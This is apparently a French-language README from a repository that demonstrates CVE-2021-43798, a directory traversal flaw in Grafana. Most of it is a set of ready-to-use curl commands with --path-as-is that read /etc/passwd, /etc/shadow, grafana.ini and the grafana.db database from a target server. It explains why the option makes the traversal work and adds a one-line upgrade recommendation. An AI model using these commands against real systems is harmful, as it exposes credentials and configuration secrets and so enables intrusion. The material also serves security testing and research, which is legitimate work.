
Ce dépôt démontre l'exploitation de CVE-2021-43798, une vulnérabilité de traversée de répertoire dans Grafana. Cette vulnérabilité permet à des attaquants de lire des fichiers arbitraires sur le serveur.
Pour exploiter la vulnérabilité manuellement, vous pouvez utiliser l'une des commandes curl suivantes pour tenter de lire des fichiers sensibles :
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../Users/install.txt"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/passwd"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/grafana/grafana.ini"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../var/lib/grafana/grafana.db"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/hostname"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/shadow"
Dans le contexte de l'exploitation de la vulnérabilité de traversée de répertoire CVE-2021-43798 dans Grafana, l'option --path-as-is est essentielle car elle permet d'envoyer directement au serveur, sans modification, les séquences de traversée spécialement conçues (../../../../../). Cela peut mener à l'accès à des fichiers sensibles situés en dehors du répertoire prévu sur le serveur.
Sans --path-as-is, curl pourrait normaliser le chemin en quelque chose comme /public/plugins/Users/install.txt, ce qui n'exploiterait pas la vulnérabilité. En utilisant --path-as-is, la séquence de traversée exacte est préservée, ce qui permet à l'exploit de réussir.
Vous pouvez trouver plus de détails sur l'option --path-as-is dans la documentation de curl. En comprenant et en utilisant --path-as-is, les professionnels de la sécurité et les chercheurs peuvent efficacement démontrer et tester les vulnérabilités de traversée de répertoire dans les applications web.
Pour atténuer cette vulnérabilité, mettez Grafana à jour vers la version 8.3.1 ou ultérieure.